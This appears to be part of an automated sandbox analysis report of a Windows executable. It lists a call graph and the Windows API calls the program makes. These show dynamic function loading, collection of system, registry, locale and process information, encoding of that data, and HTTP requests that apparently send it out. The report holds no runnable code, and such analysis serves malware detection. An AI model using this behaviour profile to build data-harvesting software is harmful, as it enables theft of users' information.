13892->13893 13894 3245c0 2 API calls 13893->13894 13895 3235d7 13894->13895 13896 3245c0 2 API calls 13895->13896 13897 3235f0 13896->13897 13898 3245c0 2 API calls 13897->13898 13899 323609 13898->13899 13900 3245c0 2 API calls 13899->13900 13901 323622 13900->13901 13902 3245c0 2 API calls 13901->13902 13903 32363b 13902->13903 13904 3245c0 2 API calls 13903->13904 13905 323654 13904->13905 13906 3245c0 2 API calls 13905->13906 13907 32366d 13906->13907 13908 3245c0 2 API calls 13907->13908 13909 323686 13908->13909 13910 3245c0 2 API calls 13909->13910 13911 32369f 13910->13911 13912 3245c0 2 API calls 13911->13912 13913 3236b8 13912->13913 13914 3245c0 2 API calls 13913->13914 13915 3236d1 13914->13915 13916 3245c0 2 API calls 13915->13916 13917 3236ea 13916->13917 13918 3245c0 2 API calls 13917->13918 13919 323703 13918->13919 13920 3245c0 2 API calls 13919->13920 13921 32371c 13920->13921 13922 3245c0 2 API calls 13921->13922 13923 323735 13922->13923 13924 3245c0 2 API calls 13923->13924 13925 32374e 13924->13925 13926 3245c0 2 API calls 13925->13926 13927 323767 13926->13927 13928 3245c0 2 API calls 13927->13928 13929 323780 13928->13929 13930 3245c0 2 API calls 13929->13930 13931 323799 13930->13931 13932 3245c0 2 API calls 13931->13932 13933 3237b2 13932->13933 13934 3245c0 2 API calls 13933->13934 13935 3237cb 13934->13935 13936 3245c0 2 API calls 13935->13936 13937 3237e4 13936->13937 13938 3245c0 2 API calls 13937->13938 13939 3237fd 13938->13939 13940 3245c0 2 API calls 13939->13940 13941 323816 13940->13941 13942 3245c0 2 API calls 13941->13942 13943 32382f 13942->13943 13944 3245c0 2 API calls 13943->13944 13945 323848 13944->13945 13946 3245c0 2 API calls 13945->13946 13947 323861 13946->13947 13948 3245c0 2 API calls 13947->13948 13949 32387a 13948->13949 13950 3245c0 2 API calls 13949->13950 13951 323893 13950->13951 13952 3245c0 2 API calls 13951->13952 13953 3238ac 13952->13953 13954 3245c0 2 API calls 13953->13954 13955 3238c5 13954->13955 
13956 3245c0 2 API calls 13955->13956 13957 3238de 13956->13957 13958 3245c0 2 API calls 13957->13958 13959 3238f7 13958->13959 13960 3245c0 2 API calls 13959->13960 13961 323910 13960->13961 13962 3245c0 2 API calls 13961->13962 13963 323929 13962->13963 13964 3245c0 2 API calls 13963->13964 13965 323942 13964->13965 13966 3245c0 2 API calls 13965->13966 13967 32395b 13966->13967 13968 3245c0 2 API calls 13967->13968 13969 323974 13968->13969 13970 3245c0 2 API calls 13969->13970 13971 32398d 13970->13971 13972 3245c0 2 API calls 13971->13972 13973 3239a6 13972->13973 13974 3245c0 2 API calls 13973->13974 13975 3239bf 13974->13975 13976 3245c0 2 API calls 13975->13976 13977 3239d8 13976->13977 13978 3245c0 2 API calls 13977->13978 13979 3239f1 13978->13979 13980 3245c0 2 API calls 13979->13980 13981 323a0a 13980->13981 13982 3245c0 2 API calls 13981->13982 13983 323a23 13982->13983 13984 3245c0 2 API calls 13983->13984 13985 323a3c 13984->13985 13986 3245c0 2 API calls 13985->13986 13987 323a55 13986->13987 13988 3245c0 2 API calls 13987->13988 13989 323a6e 13988->13989 13990 3245c0 2 API calls 13989->13990 13991 323a87 13990->13991 13992 3245c0 2 API calls 13991->13992 13993 323aa0 13992->13993 13994 3245c0 2 API calls 13993->13994 13995 323ab9 13994->13995 13996 3245c0 2 API calls 13995->13996 13997 323ad2 13996->13997 13998 3245c0 2 API calls 13997->13998 13999 323aeb 13998->13999 14000 3245c0 2 API calls 13999->14000 14001 323b04 14000->14001 14002 3245c0 2 API calls 14001->14002 14003 323b1d 14002->14003 14004 3245c0 2 API calls 14003->14004 14005 323b36 14004->14005 14006 3245c0 2 API calls 14005->14006 14007 323b4f 14006->14007 14008 3245c0 2 API calls 14007->14008 14009 323b68 14008->14009 14010 3245c0 2 API calls 14009->14010 14011 323b81 14010->14011 14012 3245c0 2 API calls 14011->14012 14013 323b9a 14012->14013 14014 3245c0 2 API calls 14013->14014 14015 323bb3 14014->14015 14016 3245c0 2 API calls 14015->14016 14017 323bcc 14016->14017 14018 3245c0 2 
API calls 14017->14018 14019 323be5 14018->14019 14020 3245c0 2 API calls 14019->14020 14021 323bfe 14020->14021 14022 3245c0 2 API calls 14021->14022 14023 323c17 14022->14023 14024 3245c0 2 API calls 14023->14024 14025 323c30 14024->14025 14026 3245c0 2 API calls 14025->14026 14027 323c49 14026->14027 14028 3245c0 2 API calls 14027->14028 14029 323c62 14028->14029 14030 3245c0 2 API calls 14029->14030 14031 323c7b 14030->14031 14032 3245c0 2 API calls 14031->14032 14033 323c94 14032->14033 14034 3245c0 2 API calls 14033->14034 14035 323cad 14034->14035 14036 3245c0 2 API calls 14035->14036 14037 323cc6 14036->14037 14038 3245c0 2 API calls 14037->14038 14039 323cdf 14038->14039 14040 3245c0 2 API calls 14039->14040 14041 323cf8 14040->14041 14042 3245c0 2 API calls 14041->14042 14043 323d11 14042->14043 14044 3245c0 2 API calls 14043->14044 14045 323d2a 14044->14045 14046 3245c0 2 API calls 14045->14046 14047 323d43 14046->14047 14048 3245c0 2 API calls 14047->14048 14049 323d5c 14048->14049 14050 3245c0 2 API calls 14049->14050 14051 323d75 14050->14051 14052 3245c0 2 API calls 14051->14052 14053 323d8e 14052->14053 14054 3245c0 2 API calls 14053->14054 14055 323da7 14054->14055 14056 3245c0 2 API calls 14055->14056 14057 323dc0 14056->14057 14058 3245c0 2 API calls 14057->14058 14059 323dd9 14058->14059 14060 3245c0 2 API calls 14059->14060 14061 323df2 14060->14061 14062 3245c0 2 API calls 14061->14062 14063 323e0b 14062->14063 14064 3245c0 2 API calls 14063->14064 14065 323e24 14064->14065 14066 3245c0 2 API calls 14065->14066 14067 323e3d 14066->14067 14068 3245c0 2 API calls 14067->14068 14069 323e56 14068->14069 14070 3245c0 2 API calls 14069->14070 14071 323e6f 14070->14071 14072 3245c0 2 API calls 14071->14072 14073 323e88 14072->14073 14074 3245c0 2 API calls 14073->14074 14075 323ea1 14074->14075 14076 3245c0 2 API calls 14075->14076 14077 323eba 14076->14077 14078 3245c0 2 API calls 14077->14078 14079 323ed3 14078->14079 14080 3245c0 2 API calls 
14079->14080 14081 323eec 14080->14081 14082 3245c0 2 API calls 14081->14082 14083 323f05 14082->14083 14084 3245c0 2 API calls 14083->14084 14085 323f1e 14084->14085 14086 3245c0 2 API calls 14085->14086 14087 323f37 14086->14087 14088 3245c0 2 API calls 14087->14088 14089 323f50 14088->14089 14090 3245c0 2 API calls 14089->14090 14091 323f69 14090->14091 14092 3245c0 2 API calls 14091->14092 14093 323f82 14092->14093 14094 3245c0 2 API calls 14093->14094 14095 323f9b 14094->14095 14096 3245c0 2 API calls 14095->14096 14097 323fb4 14096->14097 14098 3245c0 2 API calls 14097->14098 14099 323fcd 14098->14099 14100 3245c0 2 API calls 14099->14100 14101 323fe6 14100->14101 14102 3245c0 2 API calls 14101->14102 14103 323fff 14102->14103 14104 3245c0 2 API calls 14103->14104 14105 324018 14104->14105 14106 3245c0 2 API calls 14105->14106 14107 324031 14106->14107 14108 3245c0 2 API calls 14107->14108 14109 32404a 14108->14109 14110 3245c0 2 API calls 14109->14110 14111 324063 14110->14111 14112 3245c0 2 API calls 14111->14112 14113 32407c 14112->14113 14114 3245c0 2 API calls 14113->14114 14115 324095 14114->14115 14116 3245c0 2 API calls 14115->14116 14117 3240ae 14116->14117 14118 3245c0 2 API calls 14117->14118 14119 3240c7 14118->14119 14120 3245c0 2 API calls 14119->14120 14121 3240e0 14120->14121 14122 3245c0 2 API calls 14121->14122 14123 3240f9 14122->14123 14124 3245c0 2 API calls 14123->14124 14125 324112 14124->14125 14126 3245c0 2 API calls 14125->14126 14127 32412b 14126->14127 14128 3245c0 2 API calls 14127->14128 14129 324144 14128->14129 14130 3245c0 2 API calls 14129->14130 14131 32415d 14130->14131 14132 3245c0 2 API calls 14131->14132 14133 324176 14132->14133 14134 3245c0 2 API calls 14133->14134 14135 32418f 14134->14135 14136 3245c0 2 API calls 14135->14136 14137 3241a8 14136->14137 14138 3245c0 2 API calls 14137->14138 14139 3241c1 14138->14139 14140 3245c0 2 API calls 14139->14140 14141 3241da 14140->14141 14142 3245c0 2 API calls 14141->14142 
14143 3241f3 14142->14143 14144 3245c0 2 API calls 14143->14144 14145 32420c 14144->14145 14146 3245c0 2 API calls 14145->14146 14147 324225 14146->14147 14148 3245c0 2 API calls 14147->14148 14149 32423e 14148->14149 14150 3245c0 2 API calls 14149->14150 14151 324257 14150->14151 14152 3245c0 2 API calls 14151->14152 14153 324270 14152->14153 14154 3245c0 2 API calls 14153->14154 14155 324289 14154->14155 14156 3245c0 2 API calls 14155->14156 14157 3242a2 14156->14157 14158 3245c0 2 API calls 14157->14158 14159 3242bb 14158->14159 14160 3245c0 2 API calls 14159->14160 14161 3242d4 14160->14161 14162 3245c0 2 API calls 14161->14162 14163 3242ed 14162->14163 14164 3245c0 2 API calls 14163->14164 14165 324306 14164->14165 14166 3245c0 2 API calls 14165->14166 14167 32431f 14166->14167 14168 3245c0 2 API calls 14167->14168 14169 324338 14168->14169 14170 3245c0 2 API calls 14169->14170 14171 324351 14170->14171 14172 3245c0 2 API calls 14171->14172 14173 32436a 14172->14173 14174 3245c0 2 API calls 14173->14174 14175 324383 14174->14175 14176 3245c0 2 API calls 14175->14176 14177 32439c 14176->14177 14178 3245c0 2 API calls 14177->14178 14179 3243b5 14178->14179 14180 3245c0 2 API calls 14179->14180 14181 3243ce 14180->14181 14182 3245c0 2 API calls 14181->14182 14183 3243e7 14182->14183 14184 3245c0 2 API calls 14183->14184 14185 324400 14184->14185 14186 3245c0 2 API calls 14185->14186 14187 324419 14186->14187 14188 3245c0 2 API calls 14187->14188 14189 324432 14188->14189 14190 3245c0 2 API calls 14189->14190 14191 32444b 14190->14191 14192 3245c0 2 API calls 14191->14192 14193 324464 14192->14193 14194 3245c0 2 API calls 14193->14194 14195 32447d 14194->14195 14196 3245c0 2 API calls 14195->14196 14197 324496 14196->14197 14198 3245c0 2 API calls 14197->14198 14199 3244af 14198->14199 14200 3245c0 2 API calls 14199->14200 14201 3244c8 14200->14201 14202 3245c0 2 API calls 14201->14202 14203 3244e1 14202->14203 14204 3245c0 2 API calls 14203->14204 14205 3244fa 
14204->14205 14206 3245c0 2 API calls 14205->14206 14207 324513 14206->14207 14208 3245c0 2 API calls 14207->14208 14209 32452c 14208->14209 14210 3245c0 2 API calls 14209->14210 14211 324545 14210->14211 14212 3245c0 2 API calls 14211->14212 14213 32455e 14212->14213 14214 3245c0 2 API calls 14213->14214 14215 324577 14214->14215 14216 3245c0 2 API calls 14215->14216 14217 324590 14216->14217 14218 3245c0 2 API calls 14217->14218 14219 3245a9 14218->14219 14220 339c10 14219->14220 14221 339c20 43 API calls 14220->14221 14222 33a036 8 API calls 14220->14222 14221->14222 14223 33a146 14222->14223 14224 33a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14222->14224 14225 33a153 8 API calls 14223->14225 14226 33a216 14223->14226 14224->14223 14225->14226 14227 33a298 14226->14227 14228 33a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14226->14228 14229 33a337 14227->14229 14230 33a2a5 6 API calls 14227->14230 14228->14227 14231 33a344 9 API calls 14229->14231 14232 33a41f 14229->14232 14230->14229 14231->14232 14233 33a4a2 14232->14233 14234 33a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14232->14234 14235 33a4ab GetProcAddress GetProcAddress 14233->14235 14236 33a4dc 14233->14236 14234->14233 14235->14236 14237 33a515 14236->14237 14238 33a4e5 GetProcAddress GetProcAddress 14236->14238 14239 33a612 14237->14239 14240 33a522 10 API calls 14237->14240 14238->14237 14241 33a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14239->14241 14242 33a67d 14239->14242 14240->14239 14241->14242 14243 33a686 GetProcAddress 14242->14243 14244 33a69e 14242->14244 14243->14244 14245 33a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14244->14245 14246 335ca3 14244->14246 14245->14246 14247 321590 14246->14247 15368 321670 14247->15368 14250 33a7a0 lstrcpy 14251 3215b5 14250->14251 14252 33a7a0 lstrcpy 14251->14252 14253 3215c7 14252->14253 14254 33a7a0 
lstrcpy 14253->14254 14255 3215d9 14254->14255 14256 33a7a0 lstrcpy 14255->14256 14257 321663 14256->14257 14258 335510 14257->14258 14259 335521 14258->14259 14260 33a820 2 API calls 14259->14260 14261 33552e 14260->14261 14262 33a820 2 API calls 14261->14262 14263 33553b 14262->14263 14264 33a820 2 API calls 14263->14264 14265 335548 14264->14265 14266 33a740 lstrcpy 14265->14266 14267 335555 14266->14267 14268 33a740 lstrcpy 14267->14268 14269 335562 14268->14269 14270 33a740 lstrcpy 14269->14270 14271 33556f 14270->14271 14272 33a740 lstrcpy 14271->14272 14312 33557c 14272->14312 14273 335643 StrCmpCA 14273->14312 14274 3356a0 StrCmpCA 14275 3357dc 14274->14275 14274->14312 14276 33a8a0 lstrcpy 14275->14276 14277 3357e8 14276->14277 14278 33a820 2 API calls 14277->14278 14280 3357f6 14278->14280 14279 33a820 lstrlen lstrcpy 14279->14312 14282 33a820 2 API calls 14280->14282 14281 335856 StrCmpCA 14283 335991 14281->14283 14281->14312 14287 335805 14282->14287 14286 33a8a0 lstrcpy 14283->14286 14284 33a740 lstrcpy 14284->14312 14285 33a7a0 lstrcpy 14285->14312 14288 33599d 14286->14288 14289 321670 lstrcpy 14287->14289 14291 33a820 2 API calls 14288->14291 14310 335811 14289->14310 14290 321590 lstrcpy 14290->14312 14292 3359ab 14291->14292 14295 33a820 2 API calls 14292->14295 14293 335a0b StrCmpCA 14296 335a16 Sleep 14293->14296 14297 335a28 14293->14297 14294 3351f0 20 API calls 14294->14312 14298 3359ba 14295->14298 14296->14312 14299 33a8a0 lstrcpy 14297->14299 14300 321670 lstrcpy 14298->14300 14301 335a34 14299->14301 14300->14310 14302 33a820 2 API calls 14301->14302 14303 335a43 14302->14303 14305 33a820 2 API calls 14303->14305 14304 3352c0 25 API calls 14304->14312 14307 335a52 14305->14307 14306 33578a StrCmpCA 14306->14312 14309 321670 lstrcpy 14307->14309 14308 33a8a0 lstrcpy 14308->14312 14309->14310 14310->13365 14311 33593f StrCmpCA 14311->14312 14312->14273 14312->14274 14312->14279 14312->14281 14312->14284 14312->14285 14312->14290 
14312->14293 14312->14294 14312->14304 14312->14306 14312->14308 14312->14311 14314 337553 GetVolumeInformationA 14313->14314 14315 33754c 14313->14315 14316 337591 14314->14316 14315->14314 14317 3375fc GetProcessHeap RtlAllocateHeap 14316->14317 14318 337619 14317->14318 14319 337628 wsprintfA 14317->14319 14320 33a740 lstrcpy 14318->14320 14321 33a740 lstrcpy 14319->14321 14322 335da7 14320->14322 14321->14322 14322->13386 14324 33a7a0 lstrcpy 14323->14324 14325 324899 14324->14325 15377 3247b0 14325->15377 14327 3248a5 14328 33a740 lstrcpy 14327->14328 14329 3248d7 14328->14329 14330 33a740 lstrcpy 14329->14330 14331 3248e4 14330->14331 14332 33a740 lstrcpy 14331->14332 14333 3248f1 14332->14333 14334 33a740 lstrcpy 14333->14334 14335 3248fe 14334->14335 14336 33a740 lstrcpy 14335->14336 14337 32490b InternetOpenA StrCmpCA 14336->14337 14338 324944 14337->14338 14339 324ecb InternetCloseHandle 14338->14339 15383 338b60 14338->15383 14341 324ee8 14339->14341 15398 329ac0 CryptStringToBinaryA 14341->15398 14342 324963 15391 33a920 14342->15391 14345 324976 14347 33a8a0 lstrcpy 14345->14347 14352 32497f 14347->14352 14348 33a820 2 API calls 14349 324f05 14348->14349 14351 33a9b0 4 API calls 14349->14351 14350 324f27 ctype 14354 33a7a0 lstrcpy 14350->14354 14353 324f1b 14351->14353 14356 33a9b0 4 API calls 14352->14356 14355 33a8a0 lstrcpy 14353->14355 14367 324f57 14354->14367 14355->14350 14357 3249a9 14356->14357 14358 33a8a0 lstrcpy 14357->14358 14359 3249b2 14358->14359 14360 33a9b0 4 API calls 14359->14360 14361 3249d1 14360->14361 14362 33a8a0 lstrcpy 14361->14362 14363 3249da 14362->14363 14364 33a920 3 API calls 14363->14364 14365 3249f8 14364->14365 14366 33a8a0 lstrcpy 14365->14366 14368 324a01 14366->14368 14367->13389 14369 33a9b0 4 API calls 14368->14369 14370 324a20 14369->14370 14371 33a8a0 lstrcpy 14370->14371 14372 324a29 14371->14372 14373 33a9b0 4 API calls 14372->14373 14374 324a48 14373->14374 14375 33a8a0 lstrcpy 14374->14375 14376 324a51 
14375->14376 14377 33a9b0 4 API calls 14376->14377 14378 324a7d 14377->14378 14379 33a920 3 API calls 14378->14379 14380 324a84 14379->14380 14381 33a8a0 lstrcpy 14380->14381 14382 324a8d 14381->14382 14383 324aa3 InternetConnectA 14382->14383 14383->14339 14384 324ad3 HttpOpenRequestA 14383->14384 14386 324b28 14384->14386 14387 324ebe InternetCloseHandle 14384->14387 14388 33a9b0 4 API calls 14386->14388 14387->14339 14389 324b3c 14388->14389 14390 33a8a0 lstrcpy 14389->14390 14391 324b45 14390->14391 14392 33a920 3 API calls 14391->14392 14393 324b63 14392->14393 14394 33a8a0 lstrcpy 14393->14394 14395 324b6c 14394->14395 14396 33a9b0 4 API calls 14395->14396 14397 324b8b 14396->14397 14398 33a8a0 lstrcpy 14397->14398 14399 324b94 14398->14399 14400 33a9b0 4 API calls 14399->14400 14401 324bb5 14400->14401 14402 33a8a0 lstrcpy 14401->14402 14403 324bbe 14402->14403 14404 33a9b0 4 API calls 14403->14404 14405 324bde 14404->14405 14406 33a8a0 lstrcpy 14405->14406 14407 324be7 14406->14407 14408 33a9b0 4 API calls 14407->14408 14409 324c06 14408->14409 14410 33a8a0 lstrcpy 14409->14410 14411 324c0f 14410->14411 14412 33a920 3 API calls 14411->14412 14413 324c2d 14412->14413 14414 33a8a0 lstrcpy 14413->14414 14415 324c36 14414->14415 14416 33a9b0 4 API calls 14415->14416 14417 324c55 14416->14417 14418 33a8a0 lstrcpy 14417->14418 14419 324c5e 14418->14419 14420 33a9b0 4 API calls 14419->14420 14421 324c7d 14420->14421 14422 33a8a0 lstrcpy 14421->14422 14423 324c86 14422->14423 14424 33a920 3 API calls 14423->14424 14425 324ca4 14424->14425 14426 33a8a0 lstrcpy 14425->14426 14427 324cad 14426->14427 14428 33a9b0 4 API calls 14427->14428 14429 324ccc 14428->14429 14430 33a8a0 lstrcpy 14429->14430 14431 324cd5 14430->14431 14432 33a9b0 4 API calls 14431->14432 14433 324cf6 14432->14433 14434 33a8a0 lstrcpy 14433->14434 14435 324cff 14434->14435 14436 33a9b0 4 API calls 14435->14436 14437 324d1f 14436->14437 14438 33a8a0 lstrcpy 14437->14438 14439 324d28 14438->14439 
14440 33a9b0 4 API calls 14439->14440 14441 324d47 14440->14441 14442 33a8a0 lstrcpy 14441->14442 14443 324d50 14442->14443 14444 33a920 3 API calls 14443->14444 14445 324d6e 14444->14445 14446 33a8a0 lstrcpy 14445->14446 14447 324d77 14446->14447 14448 33a740 lstrcpy 14447->14448 14449 324d92 14448->14449 14450 33a920 3 API calls 14449->14450 14451 324db3 14450->14451 14452 33a920 3 API calls 14451->14452 14453 324dba 14452->14453 14454 33a8a0 lstrcpy 14453->14454 14455 324dc6 14454->14455 14456 324de7 lstrlen 14455->14456 14457 324dfa 14456->14457 14458 324e03 lstrlen 14457->14458 15397 33aad0 14458->15397 14460 324e13 HttpSendRequestA 14461 324e32 InternetReadFile 14460->14461 14462 324e67 InternetCloseHandle 14461->14462 14467 324e5e 14461->14467 14464 33a800 14462->14464 14464->14387 14465 33a9b0 4 API calls 14465->14467 14466 33a8a0 lstrcpy 14466->14467 14467->14461 14467->14462 14467->14465 14467->14466 15404 33aad0 14468->15404 14470 3317c4 StrCmpCA 14471 3317cf ExitProcess 14470->14471 14483 3317d7 14470->14483 14472 3319c2 14472->13391 14473 331913 StrCmpCA 14473->14483 14474 331932 StrCmpCA 14474->14483 14475 3318f1 StrCmpCA 14475->14483 14476 331951 StrCmpCA 14476->14483 14477 331970 StrCmpCA 14477->14483 14478 33187f StrCmpCA 14478->14483 14479 33185d StrCmpCA 14479->14483 14480 3318cf StrCmpCA 14480->14483 14481 3318ad StrCmpCA 14481->14483 14482 33a820 lstrlen lstrcpy 14482->14483 14483->14472 14483->14473 14483->14474 14483->14475 14483->14476 14483->14477 14483->14478 14483->14479 14483->14480 14483->14481 14483->14482 14485 33a7a0 lstrcpy 14484->14485 14486 325979 14485->14486 14487 3247b0 2 API calls 14486->14487 14488 325985 14487->14488 14489 33a740 lstrcpy 14488->14489 14490 3259ba 14489->14490 14491 33a740 lstrcpy 14490->14491 14492 3259c7 14491->14492 14493 33a740 lstrcpy 14492->14493 14494 3259d4 14493->14494 14495 33a740 lstrcpy 14494->14495 14496 3259e1 14495->14496 14497 33a740 lstrcpy 14496->14497 14498 3259ee InternetOpenA StrCmpCA 
14497->14498 14499 325a1d 14498->14499 14500 325fc3 InternetCloseHandle 14499->14500 14501 338b60 3 API calls 14499->14501 14502 325fe0 14500->14502 14503 325a3c 14501->14503 14505 329ac0 4 API calls 14502->14505 14504 33a920 3 API calls 14503->14504 14506 325a4f 14504->14506 14507 325fe6 14505->14507 14508 33a8a0 lstrcpy 14506->14508 14510 33a820 2 API calls 14507->14510 14514 32601f ctype 14507->14514 14509 325a58 14508->14509 14517 33a9b0 4 API calls 14509->14517 14511 325ffd 14510->14511 14512 33a9b0 4 API calls 14511->14512 14513 326013 14512->14513 14515 33a8a0 lstrcpy 14513->14515 14516 33a7a0 lstrcpy 14514->14516 14515->14514 14525 32604f 14516->14525 14518 325a82 14517->14518 14519 33a8a0 lstrcpy 14518->14519 14520 325a8b 14519->14520 14521 33a9b0 4 API calls 14520->14521 14522 325aaa 14521->14522 14523 33a8a0 lstrcpy 14522->14523 14524 325ab3 14523->14524 14526 33a920 3 API calls 14524->14526 14525->13397 14527 325ad1 14526->14527 14528 33a8a0 lstrcpy 14527->14528 14529 325ada 14528->14529 14530 33a9b0 4 API calls 14529->14530 14531 325af9 14530->14531 14532 33a8a0 lstrcpy 14531->14532 14533 325b02 14532->14533 14534 33a9b0 4 API calls 14533->14534 14535 325b21 14534->14535 14536 33a8a0 lstrcpy 14535->14536 14537 325b2a 14536->14537 14538 33a9b0 4 API calls 14537->14538 14539 325b56 14538->14539 14540 33a920 3 API calls 14539->14540 14541 325b5d 14540->14541 14542 33a8a0 lstrcpy 14541->14542 14543 325b66 14542->14543 14544 325b7c InternetConnectA 14543->14544 14544->14500 14545 325bac HttpOpenRequestA 14544->14545 14547 325fb6 InternetCloseHandle 14545->14547 14548 325c0b 14545->14548 14547->14500 14549 33a9b0 4 API calls 14548->14549 14550 325c1f 14549->14550 14551 33a8a0 lstrcpy 14550->14551 14552 325c28 14551->14552 14553 33a920 3 API calls 14552->14553 14554 325c46 14553->14554 14555 33a8a0 lstrcpy 14554->14555 14556 325c4f 14555->14556 14557 33a9b0 4 API calls 14556->14557 14558 325c6e 14557->14558 14559 33a8a0 lstrcpy 14558->14559 14560 325c77 
[Execution-graph edge list spilled from the graph rendering of the preceding function; node numbers and edges dropped. The labelled nodes record the following API calls, by code address. "N API calls" is the report's own summary of a helper it did not expand inline; "looped" marks a node the edges return to.]
• String helpers called throughout: 321590 lstrcpy; 33a740 lstrcpy; 33a7a0 lstrcpy; 33a820 lstrlen lstrcpy; 33a8a0 lstrcpy; 33a920 (3 API calls: 33a968 lstrcpy lstrcat); 33a9b0 (4 API calls: lstrcpy lstrlen lstrcpy lstrcat)
• 325e70-325f6a: lstrlen; 325e81 lstrlen GetProcessHeap RtlAllocateHeap; lstrlen at 325eae, 325ed7, 325ef0, 325f1a; 325f2a HttpSendRequestA; 325f35 InternetReadFile (looped); 325f6a InternetCloseHandle
• 330db7-330f17 and 330f67-331044: StrCmpCA at 330e27, 330e67, 330ea4, 330fb2
• 330759-330a49: StrCmpCA at 330799, 330865, 33099c; calls 32fb00, 330030 and 330250 (330250: 338de0, 2 API calls)
• 331a26-332699, one long string-building sequence that calls in turn: 337500 (6 API calls); 337690 GetProcessHeap RtlAllocateHeap, via 3377a0: 337720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA, 337765 RegQueryValueExA, 337780 RegCloseKey, then 3376c6 RegOpenKeyExA, 3376e7 RegQueryValueExA, 337704 RegCloseKey; 3377c0 GetCurrentProcess IsWow64Process; 337850 (3 API calls); 3378e0 (3 API calls); 337980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA; 337a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation, 337a9a wsprintfA; 337b00 GetUserDefaultLocaleName, 338d20 LocalAlloc CharToOemW; 337b90: 337bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList, 337c46 GetLocaleInfoA (looped), 337d1e LocalFree; 337d80 GetSystemPowerStatus; 33207e GetCurrentProcessId, 339470 OpenProcess, 339493 GetModuleFileNameExA CloseHandle; 337e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA, 337e68 RegQueryValueExA, 337e8e RegCloseKey; 337f60: 337fb9 GetLogicalProcessorInformationEx, 337fd8 GetLastError, 338084 wsprintfA (with 338a10 GetProcessHeap RtlAllocateHeap and 3389f0: 3389f9 GetProcessHeap HeapFree); 337ed0 GetSystemInfo wsprintfA; 338100: 33814d GlobalMemoryStatusEx, 338163 __aulldiv, 33819b wsprintfA; 3387c0: 3387fb GetProcessHeap RtlAllocateHeap wsprintfA; 3381f0 (string helpers only); 338320, called twice (17 API calls): 33835c RegOpenKeyExA, 3383f8 RegEnumKeyExA, 33843f wsprintfA RegOpenKeyExA, 338485 RegCloseKey RegCloseKey, 3384c1 RegQueryValueExA, 3384fa lstrlen, 33856e RegQueryValueExA, 338601 RegCloseKey, 338613 RegCloseKey; 338680: 3386bc CreateToolhelp32Snapshot Process32First, 3386e8 Process32Next (looped), 33875d CloseHandle; 33265a lstrlen; then 335190, which calls 325100 (below)
• 325009 InternetOpenUrlA, 32502a InternetReadFile (looped), 3250a0 InternetCloseHandle InternetCloseHandle
• 3247b0: 324838 lstrlen, 324848 InternetCrackUrlA
• 338b60: 338b82 GetSystemTime
• 329af9 LocalAlloc, 329b14 CryptStringToBinaryA, 329b39 LocalFree
• 338ea0: 338ead CryptBinaryToStringA, 338ece GetProcessHeap RtlAllocateHeap, 338f05 CryptBinaryToStringA
• 325100-325913: 3247b0 (2 API calls), 338ea0 (4 API calls, twice), 325192 lstrlen, 3251fd InternetOpenA StrCmpCA, 338b60 (3 API calls), 325329 InternetConnectA, 325359 HttpOpenRequestA, 3258b7 InternetCloseHandle, 3258c4 InternetCloseHandle
• 3298d0, via 329880 and 326fb0, reaches 326d40: 326660: 32668f VirtualAlloc, 326743 VirtualAlloc; 3269b0: 326a09 LoadLibraryA, 326ba8 GetProcAddress (looped, with 338a10 GetProcessHeap RtlAllocateHeap and 3389f0 heap free); 326ee6 VirtualFree; 326f26 FreeLibrary

                              Control-flow Graph

                              control_flow_graph 660 339860-339874 call 339750 663 339a93-339af2 LoadLibraryA * 5 660->663 664 33987a-339a8e call 339780 GetProcAddress * 21 660->664 666 339af4-339b08 GetProcAddress 663->666 667 339b0d-339b14 663->667 664->663 666->667 669 339b46-339b4d 667->669 670 339b16-339b41 GetProcAddress * 2 667->670 671 339b68-339b6f 669->671 672 339b4f-339b63 GetProcAddress 669->672 670->669 673 339b71-339b84 GetProcAddress 671->673 674 339b89-339b90 671->674 672->671 673->674 675 339b92-339bbc GetProcAddress * 2 674->675 676 339bc1-339bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,010922F0), ref: 003398A1
                              • GetProcAddress.KERNEL32(74DD0000,01092218), ref: 003398BA
                              • GetProcAddress.KERNEL32(74DD0000,01092248), ref: 003398D2
                              • GetProcAddress.KERNEL32(74DD0000,010922A8), ref: 003398EA
                              • GetProcAddress.KERNEL32(74DD0000,01092350), ref: 00339903
                              • GetProcAddress.KERNEL32(74DD0000,01099258), ref: 0033991B
                              • GetProcAddress.KERNEL32(74DD0000,010858D0), ref: 00339933
                              • GetProcAddress.KERNEL32(74DD0000,01085930), ref: 0033994C
                              • GetProcAddress.KERNEL32(74DD0000,01092410), ref: 00339964
                              • GetProcAddress.KERNEL32(74DD0000,010924E8), ref: 0033997C
                              • GetProcAddress.KERNEL32(74DD0000,01092368), ref: 00339995
                              • GetProcAddress.KERNEL32(74DD0000,010924A0), ref: 003399AD
                              • GetProcAddress.KERNEL32(74DD0000,01085970), ref: 003399C5
                              • GetProcAddress.KERNEL32(74DD0000,01092230), ref: 003399DE
                              • GetProcAddress.KERNEL32(74DD0000,01092440), ref: 003399F6
                              • GetProcAddress.KERNEL32(74DD0000,01085710), ref: 00339A0E
                              • GetProcAddress.KERNEL32(74DD0000,010923B0), ref: 00339A27
                              • GetProcAddress.KERNEL32(74DD0000,01092260), ref: 00339A3F
                              • GetProcAddress.KERNEL32(74DD0000,010859D0), ref: 00339A57
                              • GetProcAddress.KERNEL32(74DD0000,01092278), ref: 00339A70
                              • GetProcAddress.KERNEL32(74DD0000,01085950), ref: 00339A88
                              • LoadLibraryA.KERNEL32(01092320,?,00336A00), ref: 00339A9A
                              • LoadLibraryA.KERNEL32(010922D8,?,00336A00), ref: 00339AAB
                              • LoadLibraryA.KERNEL32(01092488,?,00336A00), ref: 00339ABD
                              • LoadLibraryA.KERNEL32(01092458,?,00336A00), ref: 00339ACF
                              • LoadLibraryA.KERNEL32(01092308,?,00336A00), ref: 00339AE0
                              • GetProcAddress.KERNEL32(75A70000,01092380), ref: 00339B02
                              • GetProcAddress.KERNEL32(75290000,010923C8), ref: 00339B23
